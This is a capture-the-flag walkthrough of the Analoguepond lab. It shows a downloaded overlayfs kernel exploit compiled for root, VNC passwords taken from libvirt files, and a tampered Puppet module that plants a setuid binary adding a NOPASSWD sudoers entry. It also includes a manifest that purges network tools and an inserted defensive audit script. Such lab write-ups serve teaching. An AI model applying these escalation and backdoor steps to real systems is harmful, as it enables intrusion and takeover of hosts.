          inet addr:192.168.85.128  Bcast:192.168.85.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fec9:a7a4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6766 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5594 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:452860 (452.8 KB)  TX bytes:521927 (521.9 KB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:71 errors:0 dropped:0 overruns:0 frame:0
          TX packets:71 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:6140 (6.1 KB)  TX bytes:6140 (6.1 KB)

virbr0    Link encap:Ethernet  HWaddr 52:54:00:b2:23:25  
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:440 errors:0 dropped:0 overruns:0 frame:0
          TX packets:218 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:24024 (24.0 KB)  TX bytes:17414 (17.4 KB)

vnet0     Link encap:Ethernet  HWaddr fe:54:00:6d:93:6a  
          inet6 addr: fe80::fc54:ff:fe6d:936a/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:424 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1698 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500 
          RX bytes:202700 (202.7 KB)  TX bytes:243315 (243.3 KB)

vnet1     Link encap:Ethernet  HWaddr fe:54:00:5b:05:f7  
          inet6 addr: fe80::fc54:ff:fe5b:5f7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:707 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1919 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500 
          RX bytes:194781 (194.7 KB)  TX bytes:285088 (285.0 KB)

Pulling up virsh and listing out the virtual hosts confirmed what we are dealing with.

virsh # list
 Id    Name                           State
----------------------------------------------------
 2     barringsbank                   running
 3     puppet                         running

Looking around the file system I really didn’t find much at first. Digging deeper I believe I found the locations of the VNC passwords but could not read them until I was root, will come back to that later.

Doing a uname -a showed that the kernel was likely vulnerable to the overlayfs root exploit:

eric@analoguepond:/var/lib/libvirt/network$ uname -a
Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

Several options come up in exploit-db:

root@kali2-CTP:/var/www/html# searchsploit overlayfs
---------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                        |  Path
                                                                                                                      | (/usr/share/exploitdb/platforms)
---------------------------------------------------------------------------------------------------------------------- ----------------------------------
OverlayFS inode Security Checks - 'inode.c' Local Security Bypass                                                     | /linux/local/36571.sh
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation                        | /linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)   | /linux/local/37293.txt
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Privilege Escalation (1)                                        | /linux/local/39166.c
Linux Kernel 4.3.3 - 'overlayfs' Privilege Escalation (2)                                                             | /linux/local/39230.c
Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)                               | /linux/local/40688.rb

Let’s go with 39166.c because this one has worked for me a few times in the past. We pull the file over to the target and compile it.

eric@analoguepond:/tmp$ wget http://192.168.110.145/39166.c
--2017-06-26 17:16:53--  http://192.168.110.145/39166.c
Connecting to 192.168.110.145:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2681 (2.6K) [text/x-csrc]
Saving to: ‘39166.c’

100%[===============================================================================================================>] 2,681       --.-K/s   in 0s      

2017-06-26 17:16:53 (47.6 MB/s) - ‘39166.c’ saved [2681/2681]

eric@analoguepond:/tmp$ gcc 39166.c -o dobber
eric@analoguepond:/tmp$ chmod +x dobber 
eric@analoguepond:/tmp$ ./dobber

Running it, we’ve got our root shell and of course our first troll flag.

root@analoguepond:/tmp# cd /root
root@analoguepond:/root# ls
flag.txt
root@analoguepond:/root# cat flag.txt 
C'Mon Man! Y'all didn't think this was the final flag so soon...?

Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker...

This is obviously troll flah #1 So keep going.

Taking a look at the libvirt default.xml network file gives us IPs and hostnames for our other hosts.

root@analoguepond:/var/lib/libvirt/network# ls
default.xml
root@analoguepond:/var/lib/libvirt/network# cat default.xml 
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh net-edit default
or other application using the libvirt API.
-->

<networkstatus>
  <class_id bitmap='0-2'/>
  <floor sum='0'/>
  <network>
    <name>default</name>
    <uuid>8edd2858-f408-4a4a-86f1-0993b59c6b30</uuid>
    <forward mode='nat'>
      <nat>
        <port start='1024' end='65535'/>
      </nat>
    </forward>
    <bridge name='virbr0' stp='on' delay='0'/>
    <mac address='52:54:00:b2:23:25'/>
    <ip address='192.168.122.1' netmask='255.255.255.0'>
      <dhcp>
        <range start='192.168.122.10' end='192.168.122.15'/>
        <host mac='52:54:00:5b:05:f7' name='puppet' ip='192.168.122.2'/>
        <host mac='52:54:00:6d:93:6a' name='barringsbank' ip='192.168.122.3'/>
      </dhcp>
    </ip>
  </network>

We can also find live hosts with a little bash one-liner:

root@analoguepond:/var/lib/libvirt/network# for ip in 192.168.122.{1..254}; do ping -c 1 $ip > /dev/null && echo "${ip} is up"; done
192.168.122.1 is up
192.168.122.2 is up
192.168.122.3 is up

Next we need the qemu config files to grab the VNC passwords:

find / -name "*.xml"
...snip...

/etc/libvirt/qemu/barringsbank.xml
/etc/libvirt/qemu/puppet.xml


root@analoguepond:/etc/libvirt/qemu# cat barringsbank.xml 
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh edit barringsbank
or other application using the libvirt API.
-->

<domain type='qemu'>
  <name>barringsbank</name>
  <uuid>6cf27edd-7559-d6eb-1502-d3135c807785</uuid>
  <description>Who do you think you are...? David Lightman from memphistennessee...?</description>
  <memory unit='KiB'>1048576</memory>
  <currentMemory unit='KiB'>1048576</currentMemory>
  <vcpu placement='static'>1</vcpu>
  <os>
    <type arch='x86_64' machine='pc-i440fx-trusty'>hvm</type>
    <boot dev='hd'/>
    <bootmenu enable='yes'/>
    <bios useserial='yes'/>
  </os>
  <features>
    <acpi/>
    <apic/>
    <pae/>
  </features>
  <clock offset='utc'/>
  <on_poweroff>destroy</on_poweroff>
  <on_reboot>restart</on_reboot>
  <on_crash>restart</on_crash>
  <devices>
    <emulator>/usr/bin/qemu-system-x86_64</emulator>
    <disk type='file' device='disk'>
      <driver name='qemu' type='qcow2'/>
      <source file='/var/lib/libvirt/images/barringsbank-1.img'/>
      <target dev='hdb' bus='ide'/>
      <address type='drive' controller='0' bus='0' target='0' unit='1'/>
    </disk>
    <controller type='pci' index='0' model='pci-root'/>
    <controller type='ide' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x1'/>
    </controller>
    <controller type='usb' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x2'/>
    </controller>
    <interface type='network'>
      <mac address='52:54:00:6d:93:6a'/>
      <source network='default'/>
      <model type='rtl8139'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x03' function='0x0'/>
    </interface>
    <serial type='pty'>
      <target port='0'/>
    </serial>
    <console type='pty'>
      <target type='serial' port='0'/>
    </console>
    <input type='mouse' bus='ps2'/>
    <input type='keyboard' bus='ps2'/>
    <graphics type='vnc' port='-1' autoport='yes' passwd='memphistennessee'/>
    <video>
      <model type='cirrus' vram='9216' heads='1'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x02' function='0x0'/>
    </video>
    <memballoon model='virtio'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x05' function='0x0'/>
    </memballoon>
  </devices>
</domain>

-------------------------------------------------

root@analoguepond:/etc/libvirt/qemu# cat puppet.xml 
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh edit puppet
or other application using the libvirt API.
-->

<domain type='qemu'>
  <name>puppet</name>
  <uuid>3561f84c-71c3-f16f-4a7b-9097e7d2ac39</uuid>
  <description>puppetmaster if you mess with this VM I will sendyoubacktowalker</description>
  <memory unit='KiB'>1048576</memory>
  <currentMemory unit='KiB'>1048576</currentMemory>
  <vcpu placement='static'>1</vcpu>
  <os>
    <type arch='x86_64' machine='pc-i440fx-trusty'>hvm</type>
    <boot dev='cdrom'/>
    <boot dev='hd'/>
    <bootmenu enable='yes'/>
    <bios useserial='yes'/>
  </os>
  <features>
    <acpi/>
    <apic/>
    <pae/>
  </features>
  <clock offset='utc'/>
  <on_poweroff>destroy</on_poweroff>
  <on_reboot>restart</on_reboot>
  <on_crash>restart</on_crash>
  <devices>
    <emulator>/usr/bin/qemu-system-x86_64</emulator>
    <disk type='file' device='disk'>
      <driver name='qemu' type='qcow2'/>
      <source file='/var/lib/libvirt/images/puppet-1.img'/>
      <target dev='hdb' bus='ide'/>
      <address type='drive' controller='0' bus='0' target='0' unit='1'/>
    </disk>
    <controller type='pci' index='0' model='pci-root'/>
    <controller type='ide' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x1'/>
    </controller>
    <controller type='usb' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x2'/>
    </controller>
    <interface type='network'>
      <mac address='52:54:00:5b:05:f7'/>
      <source network='default'/>
      <model type='virtio'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x03' function='0x0'/>
    </interface>
    <serial type='pty'>
      <target port='0'/>
    </serial>
    <console type='pty'>
      <target type='serial' port='0'/>
    </console>
    <input type='mouse' bus='ps2'/>
    <input type='keyboard' bus='ps2'/>
    <graphics type='vnc' port='-1' autoport='yes' listen='127.0.0.1' passwd='sendyoubacktowalker'>
      <listen type='address' address='127.0.0.1'/>
    </graphics>
    <video>
      <model type='cirrus' vram='9216' heads='1'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x02' function='0x0'/>
    </video>
    <memballoon model='virtio'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x04' function='0x0'/>
    </memballoon>
  </devices>
</domain>

Here we are:

‘memphistennessee’ and ‘sendyoubacktowalker’

So I next attempt to SSH to the puppet host and am presented with a possible username and a password hint in the SSH banner:

root@analoguepond:/etc/libvirt/qemu# ssh 192.168.122.2
The authenticity of host '192.168.122.2 (192.168.122.2)' can't be established.
ECDSA key fingerprint is 4e:e6:d6:38:8a:9b:3c:aa:0c:55:95:a6:57:ce:f9:e5.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.122.2' (ECDSA) to the list of known hosts.
+-----------------------------------------------+
Passwords are very dated.. Removing spaces helps sandieshaw log in with her 
most famous song                                                            
+-----------------------------------------------+

Back to Google because I clearly do not have knightmare’s music knowledge and I see that Sandie Shaw’s most famous song was called ‘Puppet on a String’. At the time I wasn’t sure if the host name referred to the song name or the Puppet open-source configuration management tool. Knowing knightmare I figured it was the latter and I was in for a wild ride yet.

I logged in with the password ‘puppetonastring’ and things started to get really interesting.

My suspicions were confirmed upon checking out the /etc/puppet directory. Basically, Puppet is an open-source configuration management tool written in Ruby which uses a series of declarative statements in the form of ‘modules’ to push down configuration changes based upon a client-server model. Seeing port 8140 listening and the modules/manifests in the /etc/puppet directory confirmed that I was on the puppetmaster server and the other host in play was the client. Browsing the manifests folder for each module we can see what each module does based on the init.pp file, which declares a class and any files, content, commands, permissions, services to install, etc.

The nodes.pp file located in /etc/puppet/manifests shows which hosts have which modules pushed down to them when a puppet run happens.

sandieshaw@puppet:/etc/puppet/manifests$ cat nodes.pp 

node 'default' {
  include vulnhub
  }

node 'puppet.example.com' inherits 'default' {
  include wiggle
  }

node 'barringsbank.example.com' inherits 'default' {
  }
sandieshaw@puppet:/etc/puppet/manifests$ cat site.pp 
node 'default' {
  include vulnhub
  }

node 'puppet.example.com' inherits 'default' {
  include wiggle
  }

node 'barringsbank.example.com' inherits 'default' {
  include fiveeights
  }

In this case we see that both hosts have the vulnhub module pushed by inheriting the ‘default’ node and that puppet has the wiggle module and our third host barringsbank has the fiveeights module pushed down.

The vulnhub module is hilarious and is knightmare’s revenge/way of stripping out every convenient utility we usually rely on. Bye curl, wget, fetch. No Nano! I started sweating, now I HAD to use vim. Thanks man! The module does a bunch of other stuff which is pretty self-explanatory, but one key item is the ‘puppet check in’ cron which runs every 10 minutes. This tells us that hosts will check into the puppetmaster every 10 minutes for anything new, like abused modules :).

sandieshaw@puppet:/etc/puppet/modules/vulnhub/manifests$ cat init.pp 
## Module to unwind changed #vulnhub people make.  This will unwind the most
## common vectors they sued to get at my other VMs

class vulnhub {

## purge packages they abuse too (hello mrB3n, GKNSB, Ch3rn0byl, mr_h4sh)
$purge = [ "nano", "wget", "curl", "fetch","nmap", "netcat-traditional",
           "ncat", "netdiscover", "lftp" ]
  package { $purge:
  ensure => purged,
  }

## The encryption is still primative Egyptian
$theresas_nightmare = [ "cryptcat", "socat" ]
  package { $theresas_nightmare:
  ensure => present,
  }

## Adding to sudoers is a bit naughty so reverse that (most of #vulnhub)
file { "/etc/sudoers.d":
  ensure => "directory",
  recurse => true,
  purge   => true,
  force   => true,
  owner   => root,
  group   => root,
  mode    => 0755,
  source  => "puppet:///modules/vulnhub/sudoers.d",
  }

## revert /etc/passwd (Hey Rasta_Mouse!)
file {'/etc/passwd':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/${hostname}-passwd",
  }

## and /etc/group (Hello to you cmaddy)
file {'/etc/group':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/${hostname}-group",
  }

## Mr Potato Head! BACKDOORS ARE NOT SECRETS (Hey GKNSB!)
file {'/etc/ssh/ssd_config':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/${hostname}-sshd_config",
  notify => Service["ssh"],
  }

## Leave US keyboard for those crazy yanks, and not to torture Ch3rn0byl like
## Gibson
cron { "puppet check in":
  command => "/usr/bin/puppet agent --test > /dev/null 2>&1",
  user => "root",
  minute => "*/10",
  ensure => present,
  }

## Everyone forbidden by default
file {'/etc/hosts.deny':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/hosts.deny",
  }

## Firewall off to only specific hosts
file {'/etc/hosts.allow':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/${hostname}-hosts.allow",
  }


## Don't fill up the disk
tidy { "/var/lib/puppet/reports":
   age     => "1h",
   recurse => true,
  }

## Changing openssh config requires restart
service { 'ssh':
  ensure      => running,
  enable      => true,
  hasstatus   => true,
  hasrestart  => true,
  }

}

The wiggle module directory gives us the source code for the C file that creates our spin binary, which is funny but, given that we have the source, not worth attempting to reverse. Stay tuned though, it will come into play soon.

sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls
spin  spin.c
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ cat spin.c 
#include <stdio.h>
#include <unistd.h>

void
advance_spinner() {
    static char bars[] = { '/', '-', '\\', '|' };
    static int nbars = sizeof(bars) / sizeof(char);
    static int pos = 0;

    printf("%c\r", bars[pos]);
    fflush(stdout);
    pos = (pos + 1) % nbars;
}

int
main() {
    while (1) {
        advance_spinner();
        usleep(300);
    }

    return 0;
}

The wiggle manifest is more interesting and is likely our priv esc. Every puppet run will check to make sure that /tmp/spin is present and then chown it as root and set the SUID bit.

sandieshaw@puppet:/etc/puppet/modules/wiggle/manifests$ cat init.pp 
## My first puppet module by Nick Leeson (C) Barringsbank
## Put spin binary in /tmp to confirm puppet is working
class wiggle {

file { [ "/tmp/spin" ]:
  ensure  => present,
  mode    => 4755,
  owner   => root,
  group   => root,
  source  => "puppet:///modules/wiggle/spin";
  }
}

The spin binary is copied from /etc/puppet/modules/wiggle/files and luckily sandieshaw has write permissions on it so we can do something nasty.

sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls -lah
total 732K
drwxrwxr-x 2 root       sandieshaw 4.0K Dec 18 18:42 .
drwxr-xr-x 4 root       root       4.0K Dec 18 18:42 ..
-rwxrwxr-x 1 sandieshaw sandieshaw 717K Dec 17 11:51 spin
-rw-rw-r-- 1 sandieshaw sandieshaw  376 Dec 17 11:52 spin.c
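
As an added defender-side check, not code from the walkthrough or from Puppet itself, the script below recreates this module layout in a temporary directory and audits every file resource that deploys a setuid binary, flagging any whose puppet:///modules/... source, or the files/ directory holding it, can be modified by a non-root user. The function names (audit_setuid_sources, build_fixture) and the fixture are my own, and the manifest parsing is a deliberately simple regex rather than Puppet's real parser.

```python
import re
import stat
import tempfile
from pathlib import Path

# Matches `file { '/path': ... }` and `file { [ "/path" ]: ... }` resource blocks.
FILE_RESOURCE = re.compile(
    r"""\bfile\s*\{\s*\[?\s*['"]([^'"]+)['"]\s*\]?\s*:(.*?)\n\s*\}""", re.S)
# Matches one `attr => value` pair inside a resource body.
ATTR = re.compile(r"""(\w+)\s*=>\s*['"]?([^'",;\n]+)['"]?""")
# puppet:///modules/<module>/<file> resolves to <modulepath>/<module>/files/<file>.
SOURCE_URL = re.compile(r"puppet:///modules/([^/]+)/(.+)")

# The wiggle manifest as shown on the page; used here only to build a fixture.
WIGGLE_INIT_PP = """\
class wiggle {

file { [ "/tmp/spin" ]:
  ensure  => present,
  mode    => 4755,
  owner   => root,
  group   => root,
  source  => "puppet:///modules/wiggle/spin";
  }
}
"""


def has_setuid(mode_text):
    """True for numeric modes carrying the setuid bit (4755, 06755) or a symbolic 's'."""
    m = mode_text.strip()
    if m.isdigit():
        return (int(m.zfill(4)[-4]) & 4) != 0
    return "s" in m


def writable_by_non_root(path):
    """True if someone other than root could modify the path: a non-root owner,
    or group/other write permission."""
    st = path.stat()
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_setuid_sources(manifest_text, modulepath):
    """Return (target, reason) for every setuid file resource whose module source
    file, or the files/ directory holding it, is not under root's sole control."""
    findings = []
    for target, body in FILE_RESOURCE.findall(manifest_text):
        attrs = {k: v.strip() for k, v in ATTR.findall(body)}
        if not has_setuid(attrs.get("mode", "")):
            continue
        src = SOURCE_URL.match(attrs.get("source", ""))
        if src is None:
            findings.append((target, "setuid mode without a puppet:/// module source"))
            continue
        module, rel = src.groups()
        src_path = Path(modulepath) / module / "files" / rel
        if not src_path.exists():
            findings.append((target, f"setuid source {src_path} does not exist"))
        elif writable_by_non_root(src_path) or writable_by_non_root(src_path.parent):
            findings.append((target, f"setuid source {src_path} is writable by a non-root user"))
    return findings


def audit_modulepath(modulepath):
    """Run the check over every manifest under <modulepath>/*/manifests/."""
    findings = []
    for pp in sorted(Path(modulepath).glob("*/manifests/*.pp")):
        findings.extend(audit_setuid_sources(pp.read_text(), modulepath))
    return findings


def build_fixture():
    """Constructed copy of the layout on the puppet host: the spin source is
    -rwxrwxr-x inside a drwxrwxr-x files/ directory, as in the ls -lah output."""
    root = Path(tempfile.mkdtemp(prefix="modules-"))
    files = root / "wiggle" / "files"
    files.mkdir(parents=True)
    (files / "spin").write_bytes(b"\x7fELF placeholder, not a real binary")
    (files / "spin").chmod(0o775)
    files.chmod(0o775)
    manifests = root / "wiggle" / "manifests"
    manifests.mkdir()
    (manifests / "init.pp").write_text(WIGGLE_INIT_PP)
    return root


if __name__ == "__main__":
    for target, reason in audit_modulepath(build_fixture()):
        print(f"{target}: {reason}")
```

On a real puppetmaster, point audit_modulepath at the configured modulepath (/etc/puppet/modules here) and treat any finding as a root-equivalent weakness, since every agent run applies the resource as root.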

I create my own version of the spin binary which allows me to run commands as root like so…

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
  setuid( 0 );
  system( "/home/sandieshaw/rootme.sh" );
  return 0;
}

rootme.sh just contains the following to add sandieshaw to the sudoers file, which is the easiest way given everything that knightmare stripped away from us:

echo "sandieshaw ALL=(ALL:ALL) NOPASSWD:ALL" >> /etc/sudoers

I compile it offline, and we could SCP it to the host, but I’m lazy so let’s just base64 encode it offline and decode it on the target:

cat spin  | openssl base64 | awk 'BEGIN{ORS="";} {print}'

...snip...

sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ echo "huge bas64 string" | base64 -d > spin
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ file spin
spin: ELF 32-bit LSB  shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped

We know from earlier that the Puppet run is every 10 minutes, so I set everything up and grab some coffee.

cron { "puppet check in":
  command => "/usr/bin/puppet agent --test > /dev/null 2>&1",
  user => "root",
  minute => "*/10",
  ensure => present,
  }

After a bit I check and see that the spin binary was replaced based on the time stamp on the file and I am able to sudo to root without a password like a champion.

sandieshaw@puppet:/tmp$ ls -la
total 12
drwxrwxrwt  2 root root 4096 Jun 26 18:20 .
drwxr-xr-x 22 root root 4096 Jan  7 11:45 ..
-rwsr-xr-x  1 root root   57 Jun 26 18:11 spin
sandieshaw@puppet:/tmp$ ls -la
total 16
drwxrwxrwt  2 root root 4096 Jun 26 18:21 .
drwxr-xr-x 22 root root 4096 Jan  7 11:45 ..
-rwsr-xr-x  1 root root 7452 Jun 26 18:21 spin

sandieshaw@puppet:/tmp$ ./spin
sandieshaw@puppet:/tmp$ sudo -s
root@puppet:/tmp#

Once I escalate to root I check out the root directory for a flag or our next clues. I am presented with several files and clues.

root@puppet:/root# cd protovision/
root@puppet:/root/protovision# ls
flag1.txt.0xff  jim  melvin
root@puppet:/root/protovision# cat jim
Mr Potato Head! Backdoors are not a...
root@puppet:/root/protovision# cat melvin 
Boy you guys are dumb! I got this all figured out...
root@puppet:/root/protovision# file flag1.txt.0xff 
flag1.txt.0xff: ASCII text, with very long lines
root@puppet:/root/protovision# cat flag1.txt.0xff 
3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861

So we have a hex string, which I decode with xxd to a reversed base64 string and eventually to the YouTube link below:

root@puppet:/root/protovision# cat flag1.txt.0xff | xxd -p -r
==gLu4yZulGa0VWbvNHIy9GIlJXZoRHIkJ3b3N3chBHIhBCZulmZgQHanlWbgU3b5BCLulGIzVGd15WatByMyASbvJnZgMXZtF2ZyF2Vgg2Y0F2dgwyay92dgQ3JuNXZvRGIzlGa0BiZJByaU5EMpdzaKpkZH1jd/g2Y0F2dv02bj5SZiVHd19Weuc3d39yL6MHc0RHaroot@puppet:/root/protovision# cat flag1.txt.0xff | xxd -p -r | rev | base64 -d
https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something...

This leads us to our mandatory movie reference, this one being from the scene in WarGames where the characters are discussing back doors. “Mr. Potato Head! Backdoors are not secrets.” In this case we may have a password of ‘secrets’ for something?

The characters also go on to correctly guess ‘Joshua’ is the back door phrase in the movie, I keep this in my back pocket for later. Maybe another password?

Exploring the directory yields a jpeg and then leads us down a rabbit hole of hidden directories.

puppet:/root/protovision# ls -la
total 24
drwxr-xr-x 3 root root 4096 Dec 21  2016 .
drwx------ 4 root root 4096 Jan  7 17:49 ..
-rw-r--r-- 1 root root  401 Dec 21  2016 flag1.txt.0xff
drwxr-xr-x 3 root root 4096 Dec 21  2016 .I_have_you_now
-rw-r--r-- 1 root root   39 Dec 17  2016 jim
-rw-r--r-- 1 root root   53 Dec 17  2016 melvin
root@puppet:/root/protovision# cd .I_have_you_now/
root@puppet:/root/protovision/.I_have_you_now# ls
grauniad_1995-02-27.jpeg
root@puppet:/root/protovision/.I_have_you_now# file grauniad_1995-02-27.jpeg 
grauniad_1995-02-27.jpeg: JPEG image data, JFIF standard 1.02
root@puppet:/root/protovision/.I_have_you_now# ls -la
total 84
drwxr-xr-x 3 root root  4096 Dec 21  2016 .
drwxr-xr-x 3 root root  4096 Dec 21  2016 ..
drwxr-xr-x 3 root root  4096 Dec 18  2016 .a
-r-------- 1 root root 71790 Dec 18  2016 grauniad_1995-02-27.jpeg

The jpeg file does have something hidden in the exif data:

root@kali2:~/Desktop# exiftool grauniad_1995-02-27.jpeg 
ExifTool Version Number         : 10.36
File Name                       : grauniad_1995-02-27.jpeg
Directory                       : .
File Size                       : 70 kB
File Modification Date/Time     : 2016:12:22 22:53:22-05:00
File Access Date/Time           : 2016:12:22 22:53:25-05:00
File Inode Change Date/Time     : 2016:12:22 22:53:22-05:00
File Permissions                : rwxr-xr-x
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Software                        : Acorn version 4.5.1
Exif Image Width                : 460
Exif Image Height               : 276
XP Comment                      : SHA1SUM 0a1f5d1ba9f15fd38b6e37734707bfd295a6795c
Padding                         : (Binary data 2060 bytes, use -b option to extract)
JFIF Version                    : 1.02
Image Width                     : 460
Image Height                    : 276
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 460x276
Megapixels                      : 0.127

I was unable to crack the SHA1 but I hold onto it for later, knowing that knightmare doesn’t generally make mistakes or put things in his challenges that aren’t connected.

I list out all the subdirectories and am damn glad I didn’t do this by hand.

root@puppet:/root/protovision/.I_have_you_now# find . -type d
.
./.a
./.a/.b
./.a/.b/.c
./.a/.b/.c/.d
./.a/.b/.c/.d/.e
./.a/.b/.c/.d/.e/.f
./.a/.b/.c/.d/.e/.f/.g
./.a/.b/.c/.d/.e/.f/.g/.h
./.a/.b/.c/.d/.e/.f/.g/.h/.i
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u.
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v.
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w.
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x.
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z

Heading in I find several files which look to form a private key if assembled properly. At the bottom of this mess I find a file with the phrase ‘joshua’, which we earlier established must be useful for something, as well as a gpg encrypted file that by the file name could be an SSH key for a user ‘nleeson’.

root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# ls
my_world_you_are_persistent_try  nleeson_key.gpg
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# file my_world_you_are_persistent_try 
my_world_you_are_persistent_try: ASCII text
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# cat my_world_you_are_persistent_try 
joshua

The gpg file decrypts to a private key file as suspected. The password that worked was actually ‘secret’ not ‘secrets’.

